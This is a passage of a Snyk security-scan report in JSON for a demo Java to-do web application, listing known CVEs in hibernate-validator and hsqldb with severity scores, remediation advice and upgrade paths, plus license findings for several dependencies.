"https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", - "title": "GitHub Commit" - }, - { - "url": 
"https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", - "title": "GitHub Commit" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-912", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/CVE-2014-3558", - "title": "Redhat Bugzilla" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:48.734535Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:09.119807Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.1", - 
"modificationTime": "2024-03-11T09:48:45.778673Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", - "epssDetails": { - "percentile": "0.70800", - "probability": "0.00319", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-3558" - ], - "CWE": [ - "CWE-592" 
- ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2016-12-25T16:51:53Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2014-07-17T16:51:53Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2014-07-17T16:51:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:45.778673Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-568162", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "credit": [ - "Alvaro Muñoz" - ], - "semver": { - "vulnerable": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "6.0.19.Final", - "6.1.3.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", - "className": "ValidatorImpl", - "functionName": "validate" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - 
"references": [ - { - "url": "https://github.com/hibernate/hibernate-validator/pull/1071", - "title": "GitHub PR" - }, - { - "url": "https://hibernate.atlassian.net/browse/HV-1758", - "title": "Jira Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:37.379564Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.797394Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.490090Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. 
This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", - "epssDetails": { - "percentile": "0.49937", - "probability": "0.00139", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10693" - ], - "CWE": [ - "CWE-20" - ], - "GHSA": [ - "GHSA-rmrm-75hp-phr2" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-05T12:05:58.541980Z", - "functions_new": [ - { - "version": [ - "[,6.0.19.Final)", - "[6.1.0,6.1.3.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.engine.ValidatorImpl", - "functionName": "validate" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-05T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-05-05T16:32:46Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.490090Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": 
false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHIBERNATE-569100", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "6.0.18.Final", - "6.1.0.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", - "className": "SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hibernate:hibernate-validator", - "references": [ - { - "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", - "title": "GitHub Commit" - }, - { - "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", - "title": "Hibernator Security Release Blog" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "cvssV3BaseScore": 6.5, - 
"modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:47.749976Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:34.418099Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:54:00.455389Z" - } - ], - "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", - "epssDetails": { - "percentile": "0.61710", - "probability": "0.00232", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-10219" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.hibernate:hibernate-validator", - "proprietary": false, - "creationTime": "2020-05-14T16:07:06.897969Z", - "functions_new": [ - { - "version": [ - "[,6.0.18.Final)", - "[6.1.0.Alpha1,6.1.0.Final)" - ], - "functionId": { - "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", - "functionName": "getFragmentAsDocument" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-10-18T14:55:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - 
"mavenModuleName": { - "groupId": "org.hibernate", - "artifactId": "hibernate-validator" - }, - "publicationTime": "2020-01-09T14:55:12Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.455389Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-validator", - "version": "4.3.1.Final", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-ORGHSQLDB-3040860", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - 
"severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2", - 
"severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final", - "severityWithCritical": "medium" - }, - { - "id": 
"snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - 
"id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[3.0.1.GA, 3.1.2.GA)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.jboss.logging:jboss-logging", - "creationTime": "2024-06-18T02:47:02.411Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:47:02.411Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.jboss.logging:jboss-logging@3.1.0.CR2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.jboss.logging:jboss-logging", - "version": "3.1.0.CR2", - "severityWithCritical": "medium" - } - ], - "upgrade": { - "org.apache.logging.log4j:log4j-core@2.7": { - "upgradeTo": "org.apache.logging.log4j:log4j-core@2.13.2", - "upgrades": [ - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "vulns": [ - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409" - ] - }, - "org.apache.struts:struts2-core@2.3.20": { - "upgradeTo": "org.apache.struts:struts2-core@6.1.2", - "upgrades": [ - "commons-fileupload:commons-fileupload@1.3.1", - "commons-io:commons-io@2.2", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - 
